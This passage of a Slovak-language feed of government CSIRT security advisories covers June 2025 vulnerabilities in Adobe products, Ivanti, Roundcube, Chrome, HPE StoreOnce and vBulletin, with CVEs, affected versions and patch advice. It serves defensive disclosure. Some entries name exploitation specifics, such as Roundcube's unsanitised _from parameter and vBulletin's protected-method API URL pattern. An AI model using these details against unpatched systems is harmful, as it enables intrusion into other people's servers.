<li>Acrobat 2024 vo verziách starších ako 24.001.30254</li>



<li>Acrobat 2020 vo verziách starších ako 20.005.30774</li>



<li>Acrobat Reader 2020 vo verziách starších ako 20.005.30774</li>



<li>Adobe Substance 3D Painter vo verziách starších ako 11.0.2</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong><u>Adobe InCopy:</u></strong></p>



<p><strong>CVE-2025-30327, CVE-2025-47107 </strong>(CVSS skóre 7,8)</p>



<p>Zraniteľnosti spočívajúce v&nbsp;pretečení medzipamäte haldy (CVE-2025-47107) a&nbsp;pretečení celočíselnej hodnoty (CVE-2025-30327) možno zneužiť na <strong>vykonanie kódu</strong>.</p>



<p><strong><u>Adobe Experience Manager:</u></strong></p>



<p><strong>CVE-2025-46840 </strong>(CVSS skóre 8,7)<strong>, CVE-2025-46837 </strong>(CVSS skóre 7,1)</p>



<p>Kritické zraniteľnosti spočívajúce v&nbsp;nesprávnej autorizácii (CVE-2025-46840) a&nbsp;nedostatočnom overovaní používateľských vstupov (CVE-2025-46837) možno zneužiť na <strong>eskaláciu privilégií</strong> a&nbsp;<strong>vykonanie kódu</strong>.</p>



<p><strong><u>Adobe Commerce, Adobe Commerce B2B, Magento Open Source:</u></strong></p>



<p><strong>CVE-2025-47110 </strong>(CVSS skóre 9,1)</p>



<p>CVE-2025-47110 by vzdialený autentifikovaný útočník mohol zneužiť na <strong>realizáciu XSS (Cross Site Scripting) útokov</strong> a&nbsp;úplné narušenie dôvernosti, integrity a&nbsp;dostupnosti systému. Zneužitie zraniteľnosti nevyžaduje interakciu zo strany používateľa.</p>



<p><strong>CVE-2025-43585 </strong>(CVSS skóre 8,2)</p>



<p>Chybu spočívajúcu v&nbsp;nesprávnej autorizáciu by vzdialený neautentifikovaný útočník mohol zneužiť na <strong>obídenie bezpečnostného prvku</strong> a&nbsp;získanie úplnej kontroly nad systémom. Zneužitie zraniteľnosti nevyžaduje interakciu zo strany používateľa.</p>



<p><strong><u>Adobe InDesign:</u></strong></p>



<p><strong>CVE-2025-30317, CVE-2025-43558, CVE-2025-43589, CVE-2025-43590, CVE-2025-43593 </strong>(CVSS skóre 7,8)</p>



<p>Zraniteľnosti spočívajú v&nbsp;zápise mimo povolených hodnôt (CVE-2025-43590, CVE-2025-43593, CVE-2025-43558), použití odalokovaného miesta v&nbsp;pamäti (CVE-2025-43589) a&nbsp;pretečení medzipamäte haldy (CVE-2025-30317) možno zneužiť na <strong>vykonanie škodlivého kódu</strong>.</p>



<p><strong><u>Adobe Substance 3D Sampler:</u></strong></p>



<p><strong>CVE-2025-43581, CVE-2025-43588 </strong>(CVSS skóre 7,8)</p>



<p>Zápis mimo povolených hodnôt umožňuje <strong>vykonanie škodlivého kódu</strong> s&nbsp;následkom úplného narušenia dôvernosti, integrity a&nbsp;dostupnosti systému.</p>



<p><strong><u>Acrobat DC, Acrobat Reader DC, Acrobat 2024, Acrobat 2020, Acrobat Reader 2020:</u></strong></p>



<p><strong>CVE-2025-43573, CVE-2025-43574, CVE-2025-43575, CVE-2025-43576 </strong>(CVSS skóre 7,8)</p>



<p>Zraniteľnosti spočívajúce v zápise mimo povolených hodnôt (CVE-2025-43575) a&nbsp;použití odalokovaného miesta v&nbsp;pamäti (CVE-2025-43573, CVE-2025-43574, CVE-2025-43576) možno zneužiť na <strong>vykonanie škodlivého kódu</strong>.</p>



<p><strong><u>Adobe Substance 3D Painter:</u></strong></p>



<p><strong>CVE-2025-47108 </strong>(CVSS skóre 7,8)</p>



<p>Zraniteľnosť spočíva v zápise mimo povolených hodnôt a&nbsp;možno ju zneužiť na <strong>vykonanie škodlivého kódu</strong>.</p>



<p><strong>Pozn.: Ak nie je uvedené inak, zneužitie všetkých vyššie uvedených zraniteľností vyžaduje interakciu zo strany používateľa, ktorý musí otvoriť špeciálne vytvorený súbor.</strong></p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vykonanie škodlivého kódu</strong></li>



<li><strong>Obídenie bezpečnostného prvku</strong></li>



<li><strong>Eskalácia privilégií</strong></li>



<li><strong>Neoprávnený prístup k&nbsp;citlivým údajom</strong></li>



<li><strong>Zneprístupnenie služby</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Odporúčame vykonať bezodkladnú aktualizáciu zasiahnutých systémov na verzie špecifikované v&nbsp;časti Zraniteľné systémy alebo&nbsp;na webových stránkach výrobcu uvedených v&nbsp;časti Zdroje. Zároveň odporúčame použiť používateľov, aby neotvárali správy a&nbsp;prílohy z&nbsp;neznámych a&nbsp;nedôveryhodných zdrojov.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://helpx.adobe.com/security/products/incopy/apsb25-41.html">https://helpx.adobe.com/security/products/incopy/apsb25-41.html</a></li>



<li><a href="https://helpx.adobe.com/security/products/experience-manager/apsb25-48.html">https://helpx.adobe.com/security/products/experience-manager/apsb25-48.html</a></li>



<li><a href="https://helpx.adobe.com/security/products/magento/apsb25-50.html">https://helpx.adobe.com/security/products/magento/apsb25-50.html</a></li>



<li><a href="https://helpx.adobe.com/security/products/indesign/apsb25-53.html">https://helpx.adobe.com/security/products/indesign/apsb25-53.html</a></li>



<li><a href="https://helpx.adobe.com/security/products/substance3d-sampler/apsb25-55.html">https://helpx.adobe.com/security/products/substance3d-sampler/apsb25-55.html</a></li>



<li><a href="https://helpx.adobe.com/security/products/acrobat/apsb25-57.html">https://helpx.adobe.com/security/products/acrobat/apsb25-57.html</a></li>



<li><a href="https://helpx.adobe.com/security/products/substance3d_painter/apsb25-58.html">https://helpx.adobe.com/security/products/substance3d_painter/apsb25-58.html</a></li>



<li><a href="https://thehackernews.com/2025/06/adobe-releases-patch-fixing-254.html">https://thehackernews.com/2025/06/adobe-releases-patch-fixing-254.html</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2425/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Vysoko závažné zraniteľnosti v produkte Ivanti Workspace Control</title>
		<link>/posts/2423</link>
					<comments>/posts/2423#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Fri, 13 Jun 2025 12:14:56 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[information disclosure]]></category>
		<category><![CDATA[Ivanti]]></category>
		<guid isPermaLink="false">/?p=2423</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/12/Ivanti-Logo-1024x710.jpg" alt="" /></p>Spoločnosť Ivanti vydala bezpečnostné aktualizácie, ktoré opravujú 3 vysoko závažné zraniteľnosti v&#160;produkte pre centralizovaný manažment zariadení a&#160;aplikácií Ivanti Workspace Control....]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/12/Ivanti-Logo-1024x710.jpg" alt="" /></p>
<p><strong>Spoločnosť Ivanti vydala bezpečnostné aktualizácie, ktoré opravujú 3 vysoko závažné zraniteľnosti v&nbsp;produkte pre centralizovaný manažment zariadení a&nbsp;aplikácií Ivanti Workspace Control. Zraniteľnosti možno zneužiť na získanie prihlasovacích údajov uložených v&nbsp;aplikácii a&nbsp;úplné narušenie dôvernosti, integrity a&nbsp;dostupnosti systému.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Ivanti Workspace Control vo verziách 10.19.0.0 a starších</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2025-5353, CVE-2025-22455 &nbsp;</strong>(CVSS skóre 8,8) a <strong>CVE-2025-22463 </strong>(CVSS skóre 7,3)</p>



<p>Vysoko závažné zraniteľnosti spočívajú v&nbsp;existencii zabudovaných kryptografických kľúčov, ktoré by lokálny autentifikovaný útočník mohol zneužiť na <strong>dešifrovanie prihlasovacích údajov k SQL</strong> (CVE-2025-5353, CVE-2025-22455) <strong>a&nbsp;spravovanému prostrediu</strong> (CVE-2025-22463). Uvedené prihlasovacie údaje možno zneužiť v&nbsp;rámci ďalších útokov a&nbsp;na <strong>úplné narušenie dôvernosti, integrity a&nbsp;dostupnosti systému</strong>.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Neoprávnený prístup k&nbsp;citlivým údajom</strong><strong></strong></li>



<li><strong>Úplné narušenie dôvernosti, integrity a&nbsp;dostupnosti systému</strong><strong></strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Administrátorom Ivanti Workspace Control odporúčame vykonať bezodkladnú aktualizáciu systémov na verziu 10.19.10.0. Táto verzia vyžaduje použitie nového komponentu Shield API, ktorý slúži na autentifikáciu spojení ku Datastore. Kompletný návod na inštaláciu, konfiguráciu a&nbsp;manažment tohto komponentu môžete nájsť na <a href="https://help.ivanti.com/res/help/en_US/IWC/2025/ShieldAPI/Content/LandingPage.htm">stránke výrobcu</a>.</p>



<p><strong>Spoločnosť </strong><a href="https://forums.ivanti.com/s/article/Product-Life-Cycle-Policy-for-Ivanti-Workspace-Control-formerly-RES-ONE-Workspace-and-VDX#:~:text=58%3A18%20AM-,Ivanti%20Workspace%20Control%20and%20Ivanti%20Virtual%20Desktop%20Extender,Life%20Date%3A%20December%2031%2C%202026"><strong>Ivanti informovala</strong></a><strong>, že k&nbsp;31.12.2026 ukončí poskytovanie technickej podpory pre tento produkt a&nbsp;odporúča migráciu na produkt Ivanti User Workspace Manager.</strong></p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Workspace-Control-CVE-2025-5353-CVE-CVE-2025-22463-CVE-2025-22455?language=en_US">https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Workspace-Control-CVE-2025-5353-CVE-CVE-2025-22463-CVE-2025-22455?language=en_US</a></li>



<li><a href="https://www.bleepingcomputer.com/news/security/ivanti-workspace-control-hardcoded-key-flaws-expose-sql-credentials/">https://www.bleepingcomputer.com/news/security/ivanti-workspace-control-hardcoded-key-flaws-expose-sql-credentials/</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2423/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Aktívne zneužívaná kritická zraniteľnosť v open-source webmailovom riešení RoundCube</title>
		<link>/posts/2421</link>
					<comments>/posts/2421#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Fri, 13 Jun 2025 12:13:52 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[RCE]]></category>
		<category><![CDATA[Roundcube]]></category>
		<guid isPermaLink="false">/?p=2421</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/08/Roundcube.webp" alt="" /></p>Vývojári populárnej webmailovej platformy Roundcube vydali bezpečnostné aktualizácie, ktoré opravujú aktívne zneužívanú kritickú zraniteľnosť. CVE-2025-49113 by vzdialený útočník mohol zneužiť...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/08/Roundcube.webp" alt="" /></p>
<p><strong>Vývojári populárnej webmailovej platformy Roundcube vydali bezpečnostné aktualizácie, ktoré opravujú aktívne zneužívanú kritickú zraniteľnosť. CVE-2025-49113 by vzdialený útočník mohol zneužiť na vzdialené vykonanie kódu zaslaním špeciálne vytvorenej požiadavky HTTP GET.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Roundcube vo verziách starších ako 1.15.10 LTS</li>



<li>Roundcube 1.6.X vo verziách starších ako 1.6.11</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2025-49113 </strong>(CVSSv3 skóre 9,9)<strong></strong></p>



<p><strong>Kritická zraniteľnosť sa nachádza v&nbsp;skripte </strong><strong>/program/actions/settings/upload.php</strong><strong> a </strong><strong>spočíva v&nbsp;absencii sanitizácie parametra </strong><strong>_from</strong><strong>, ktorú možno zneužiť na vykonanie kódu po deserializácii PHP objektov. Vzdialený autentifikovaný útočník by ju mohol zneužiť zaslaním špeciálne vytvorených HTTP GET požiadaviek. Zneužitie zraniteľnosti síce vyžaduje úspešné prihlásenie, ale prihlasovacie údaje možno podľa zdrojov získať rôznymi formami útokov (napr. phishing, brute-force, CSRF).</strong><strong></strong></p>



<p>Útočníkom sa analýzou hotfixu vydaného 1. júna 2025 podarilo získať dostatok informácií na vytvorenie funkčného exploitu, ktorý <a href="https://x.com/k_firsov/status/1930246402099044789">je na predaj na hackerských fórach</a>. V&nbsp;nadväznosti na túto skutočnosť b<strong>ezpečnostní výskumníci zo spoločnosť FearsOff zverejnili aj </strong><a href="https://github.com/fearsoff-org/CVE-2025-49113">Proof-of-Concept kód</a><strong> demonštrujúci spôsob zneužitia zraniteľnosti.</strong><strong></strong></p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonanie kódu</strong></li>



<li><strong>Úplné narušenie dôvernosti, integrity a&nbsp;dostupnosti systému</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Administrátorom odporúčame vykonať bezodkladnú aktualizáciu Roundcube na verzie 1.15.10 LTS alebo 1.6.11. Rovnako odporúčame preveriť logy Roundcube, sieťových a&nbsp;bezpečnostných prvkov na prítomnosť pokusov o&nbsp;zneužitie zraniteľnosti.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://roundcube.net/news/2025/06/01/security-updates-1.6.11-and-1.5.10">https://roundcube.net/news/2025/06/01/security-updates-1.6.11-and-1.5.10</a></li>



<li><a href="https://fearsoff.org/research/roundcube">https://fearsoff.org/research/roundcube</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-49113">https://nvd.nist.gov/vuln/detail/CVE-2025-49113</a></li>



<li><a href="https://thehackernews.com/2025/06/critical-10-year-old-roundcube-webmail.html">https://thehackernews.com/2025/06/critical-10-year-old-roundcube-webmail.html</a></li>



<li><a href="https://www.bleepingcomputer.com/news/security/hacker-selling-critical-roundcube-webmail-exploit-as-tech-info-disclosed/">https://www.bleepingcomputer.com/news/security/hacker-selling-critical-roundcube-webmail-exploit-as-tech-info-disclosed/</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2421/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Aktívne zneužívaná zero-day zraniteľnosť v prehliadači Chrome</title>
		<link>/posts/2419</link>
					<comments>/posts/2419#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Fri, 13 Jun 2025 12:12:52 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Chrome]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=2419</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/01/google-chrome-cropped.png" alt="" /></p>Spoločnosť Google vydala bezpečnostné aktualizácie pre svoj webový prehliadač Chrome, ktoré opravujú aktívne zneužívanú zero-day zraniteľnosť. CVE-2025-5419 by vzdialený neautentifikovaný...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/01/google-chrome-cropped.png" alt="" /></p>
<p><strong>Spoločnosť Google vydala bezpečnostné aktualizácie pre svoj webový prehliadač Chrome, ktoré opravujú aktívne zneužívanú zero-day zraniteľnosť. CVE-2025-5419 by vzdialený neautentifikovaný útočník mohol zneužiť na vzdialené vykonanie kódu.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Chrome pre Windows a&nbsp;Mac vo verziách starších ako 137.0.7151.68/.69</li>



<li>Chrome pre Linux vo verziách starších ako 137.0.7151.68</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2025-5419 </strong>(CVSSv3 skóre 8,8)</p>



<p>Zraniteľnosť vysokej závažnosti sa nachádza v&nbsp;komponente V8 a&nbsp;vzdialený neautentifikovaný útočník by ju podvrhnutím špeciálne vytvoreného webového obsahu mohol zneužiť na čítanie a&nbsp;zápis mimo povolených hodnôt, s&nbsp;potenciálom pre&nbsp;<strong>vzdialené vykonanie kódu</strong>.</p>



<p><strong>Pozn.: Zraniteľnosť je podľa spoločnosti Google aktívne zneužívaná.</strong><strong></strong></p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonanie kódu</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Administrátorom a&nbsp;používateľom odporúčame bezodkladnú aktualizáciu prehliadača Chrome na najnovšie verzie 137.0.7151.68/.69 (Windows, Mac) a 137.0.7151.68 (Linux).</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://chromereleases.googleblog.com/2025/06/stable-channel-update-for-desktop.html">https://chromereleases.googleblog.com/2025/06/stable-channel-update-for-desktop.html</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-5419">https://nvd.nist.gov/vuln/detail/CVE-2025-5419</a></li>



<li><a href="https://thehackernews.com/2025/06/new-chrome-zero-day-actively-exploited.html">https://thehackernews.com/2025/06/new-chrome-zero-day-actively-exploited.html</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2419/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritická zraniteľnosť v produkte Hewlett Packard Enterprise StoreOnce</title>
		<link>/posts/2417</link>
					<comments>/posts/2417#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Thu, 12 Jun 2025 15:37:50 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[HPE]]></category>
		<category><![CDATA[information disclosure]]></category>
		<category><![CDATA[RCE]]></category>
		<category><![CDATA[StoreOnce]]></category>
		<guid isPermaLink="false">/?p=2417</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/11/Hewlett-Packard-Logo-1999-1024x576.png" alt="" /></p>Spoločnosť Hewlett Packard Enterprise vydala bezpečnostné aktualizácie svojho riešenia pre deduplikáciu, zálohovanie a&#160;obnovu dát StoreOnce, ktoré opravujú 8 zraniteľností. Jedna...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/11/Hewlett-Packard-Logo-1999-1024x576.png" alt="" /></p>
<p><strong>Spoločnosť Hewlett Packard Enterprise vydala bezpečnostné aktualizácie svojho riešenia pre deduplikáciu, zálohovanie a&nbsp;obnovu dát StoreOnce, ktoré opravujú 8 zraniteľností. Jedna z nich je označená ako kritická. CVE-2025-37093 možno zneužiť na obídenie mechanizmov autentifikácie a&nbsp;získanie úplnej kontroly nad systémom.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>HPE StoreOnce vo verziách starších ako 4.3.11</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2025-37093 </strong>(CVSSv3 skóre 9,8)</p>



<p>Kritická zraniteľnosť spočíva v&nbsp;nedostatočnej implementácii mechanizmov autentifikácie v&nbsp;rámci metódy machineAccountCheck. Vzdialený neautentifikovaný útočník by ju mohol zneužiť na <strong>získanie neoprávneného prístupu do systému</strong> a&nbsp;<strong>získanie úplnej kontroly nad systémom</strong>.</p>



<p><strong>CVE-2025-37089, CVE-2025-37091, CVE-2025-37092, CVE-2025-37096</strong> (CVSSv3 skóre 7,2)</p>



<p>Vysoko závažné zraniteľnosti spočívajú v&nbsp;nedostatočnom overovaní používateľských vstupov v&nbsp;rámci metód setLocateBeaconOnHardware, queryHardwareReportLocally, doExecute a&nbsp;getServerCertificate a možno ich zneužiť na <strong>vzdialené vykonanie kódu v&nbsp;kontexte používateľa root</strong>.</p>



<p>Ostatné zraniteľnosti možno zneužiť na realizáciu útokov Server-Side Request Forgery (<strong>CVE-2025-37090</strong>), vykonanie neoprávnených zmien v&nbsp;systéme (<strong>CVE-2025-37094</strong>) a&nbsp;získanie neoprávneného prístupu k&nbsp;citlivým údajom (<strong>CVE-2025-37095</strong>).</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonanie kódu</strong></li>



<li><strong>Neoprávnený prístup k citlivým údajom</strong></li>



<li><strong>Neoprávnená zmena v systéme</strong></li>



<li><strong>Získanie úplnej kontroly nad systémom</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Administrátorom odporúčame vykonať bezodkladnú aktualizáciu produktu HPE StoreOnce na verziu 4.3.11 alebo novšiu.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbst04847en_us&amp;docLocale=en_US">https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbst04847en_us&amp;docLocale=en_US</a></li>



<li><a href="https://www.zerodayinitiative.com/advisories/ZDI-25-316/">https://www.zerodayinitiative.com/advisories/ZDI-25-316/</a></li>



<li><a href="https://www.zerodayinitiative.com/advisories/ZDI-CAN-24981/">https://www.zerodayinitiative.com/advisories/ZDI-CAN-24981/</a></li>



<li><a href="https://www.zerodayinitiative.com/advisories/ZDI-CAN-24983/">https://www.zerodayinitiative.com/advisories/ZDI-CAN-24983/</a></li>



<li><a href="https://www.zerodayinitiative.com/advisories/ZDI-CAN-24984/">https://www.zerodayinitiative.com/advisories/ZDI-CAN-24984/</a></li>



<li><a href="https://www.zerodayinitiative.com/advisories/ZDI-CAN-25316/">https://www.zerodayinitiative.com/advisories/ZDI-CAN-25316/</a><a href="https://www.bleepingcomputer.com/news/security/hewlett-packard-enterprise-warns-of-critical-storeonce-auth-bypass/">https://www.bleepingcomputer.com/news/security/hewlett-packard-enterprise-warns-of-critical-storeonce-auth-bypass/</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2417/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Aktívne zneužívané kritické zraniteľnosti v platforme vBulletin</title>
		<link>/posts/2414</link>
					<comments>/posts/2414#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Thu, 12 Jun 2025 15:34:04 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[RCE]]></category>
		<category><![CDATA[vBulletin]]></category>
		<guid isPermaLink="false">/?p=2414</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2025/06/vbulletin-1024x583.png" alt="" /></p>Bezpečnostní výskumníci zverejnili informácie o aktívne zneužívaných kritických zraniteľnostiach v redakčnom systéme pre tvorbu online fór vBulletin. CVE-2025-48827 a CVE-2025-48828...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2025/06/vbulletin-1024x583.png" alt="" /></p>
<p><strong>Bezpečnostní výskumníci zverejnili informácie o aktívne zneužívaných kritických zraniteľnostiach v redakčnom systéme pre tvorbu online fór vBulletin. CVE-2025-48827 a CVE-2025-48828 by vzdialený neautentifikovaný útočník mohol zneužiť na volanie chránených metód a&nbsp;vzdialené vykonanie kódu.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>vBulletin vo verziách 5.0.0 až 5.7.5</li>



<li>vBulletin vo verziách 6.0.0 až 6.0.3</li>
</ul>



<p>Pozn.: Zraniteľnosti je možné zneužiť len na systémoch, kde vBulletin beží na PHP vo verzii 8.1 alebo novšej.</p>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2025-48827 </strong>(CVSSv3 skóre 10,0)</p>



<p>Kritická zraniteľnosť spočíva v&nbsp;nesprávnom využití PHP Reflecion API, ktoré kvôli zmenám zavedeným v&nbsp;PHP vo verziách od 8.1 možno zneužiť na volanie chránených metód API. Zraniteľnosť by vzdialený neautentifikovaný útočník mohol zneužiť navštívením špeciálne vytvorených URL v&nbsp;tvare /api.php?method=chranenaMetoda.</p>



<p><strong>CVE-2025-48828 </strong>(CVSSv3 skóre 9,0)</p>



<p>Kritická zraniteľnosť sa nachádza v nástroji pre spracovanie vzorov a&nbsp;vzdialený neautentifikovaný útočník by ju podvrhnutím špeciálne vytvoreného vzoru obsahujúceho Template Conditionals mohol zneužiť na vzdialené vykonanie kódu PHP.</p>



<p><strong>Pozn.: Zraniteľnosti sú aktívne zneužívané minimálne od mája 2025. Výrobca podľa spoločnosti Karma(In)Security vydal </strong><a href="https://forum.vbulletin.com/forum/vbulletin-announcements/vbulletin-announcements_aa/4491049-security-patch-released-for-vbulletin-6-x-and-5-7-5">aktualizácie už v apríli 2024</a><strong>, ale bez poskytnutia bližších informácií. V súčasnosti zostáva veľké množstvo neaktualizovaných inštancií zraniteľných.</strong></p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonanie kódu</strong></li>



<li><strong>Úplné narušenie dôvernosti, integrity a&nbsp;dostupnosti systému</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Administrátorom odporúčame vykonať bezodkladnú aktualizáciu verzií 6.x na Patch Level 1, verzie 5.7.5 na Patch Level 3, alebo prejsť na najnovšiu verziu 6.1.2. Odporúčame tiež&nbsp;preveriť logy vBulletin, sieťových a&nbsp;bezpečnostných prvkov na prítomnosť pokusov o&nbsp;zneužitie zraniteľností.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://karmainsecurity.com/dont-call-that-protected-method-vbulletin-rce">https://karmainsecurity.com/dont-call-that-protected-method-vbulletin-rce</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-48827">https://nvd.nist.gov/vuln/detail/CVE-2025-48827</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-48828">https://nvd.nist.gov/vuln/detail/CVE-2025-48828</a></li>



<li><a href="https://kevintel.com/CVE-2025-48828">https://kevintel.com/CVE-2025-48828</a></li>



<li><a href="https://www.bleepingcomputer.com/news/security/hackers-are-exploiting-critical-flaw-in-vbulletin-forum-software/">https://www.bleepingcomputer.com/news/security/hackers-are-exploiting-critical-flaw-in-vbulletin-forum-software/</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2414/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Mesačný prehľad kritických zraniteľností máj 2025</title>
		<link>/posts/2408</link>
					<comments>/posts/2408#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Wed, 04 Jun 2025 12:37:58 +0000</pubDate>
				<category><![CDATA[Aktuality]]></category>
		<category><![CDATA[Tlačová správa]]></category>
		<category><![CDATA[monthly report]]></category>
		<category><![CDATA[VJCSIRT]]></category>
		<guid isPermaLink="false">/?p=2408</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/01/charts-1.jpg" alt="" /></p>Na našej web stránke boli doplnené informácie o závažných bezpečnostných udalostiach a zraniteľnostiach informačných systémov zaznamenaných v mesiaci máj 2025....]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/01/charts-1.jpg" alt="" /></p>
<p>Na našej web stránke boli doplnené informácie o závažných bezpečnostných udalostiach a zraniteľnostiach informačných systémov zaznamenaných v mesiaci máj 2025.</p>



<p><a href="https://csirt.sk/wp-content/uploads/2025/06/2025_05_mesacnik.pdf" data-type="link" data-id="/wp-content/uploads/2024/12/2024_11_mesacnik.pdf">Mesačný prehľad – 05/2025 PDF (521 kB)</a></p>



<p>Prehľady sú spracovávané od októbra 2014 a sú dostupné na <a href="https://csirt.sk/mesacny-prehlad-kritickych-a-zavaznych-softver">tomto odkaze</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2408/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Vládna jednotka CSIRT získala medzinárodnú certifikáciu Trusted Introducer</title>
		<link>/posts/2405</link>
					<comments>/posts/2405#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Wed, 04 Jun 2025 07:39:24 +0000</pubDate>
				<category><![CDATA[Aktuality]]></category>
		<category><![CDATA[Tlačová správa]]></category>
		<category><![CDATA[VJCSIRT]]></category>
		<guid isPermaLink="false">/?p=2405</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2025/06/certified-by-trusted-introducer-e1749022881646.png" alt="" /></p>V máji sa Vládna jednotka CSIRT sa oficiálne stala druhým medzinárodne certifikovaným kyberbezpečnostným tímom na Slovensku. 27. mája 2025 prebrala osvedčenie...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2025/06/certified-by-trusted-introducer-e1749022881646.png" alt="" /></p>
<p>V máji sa Vládna jednotka CSIRT sa oficiálne stala druhým medzinárodne certifikovaným kyberbezpečnostným tímom na Slovensku. 27. mája 2025 prebrala osvedčenie o certifikácii „<a href="https://sim3-check.opencsirt.org" data-type="link" data-id="https://sim3-check.opencsirt.org">SIM3 Trusted introducer – certified</a>“ na medzinárodnej konferencii 74th TF-CSIRT Meeting v nórskom Oslo a zaradila sa tak oficiálne medzi elitné svetové tímy zaberajúce sa kybernetickou bezpečnosťou. Certifikácia bola oficiálne schválená 10. mája riadiacim výborom <a href="https://trusted-introducer.org/" data-type="link" data-id="https://trusted-introducer.org/">Trusted Introducer</a>, ktorá je najvyššou certifikačnou autoritou združujúcou kľúčové subjekty v oblasti kybernetickej bezpečnosti v Európe.</p>



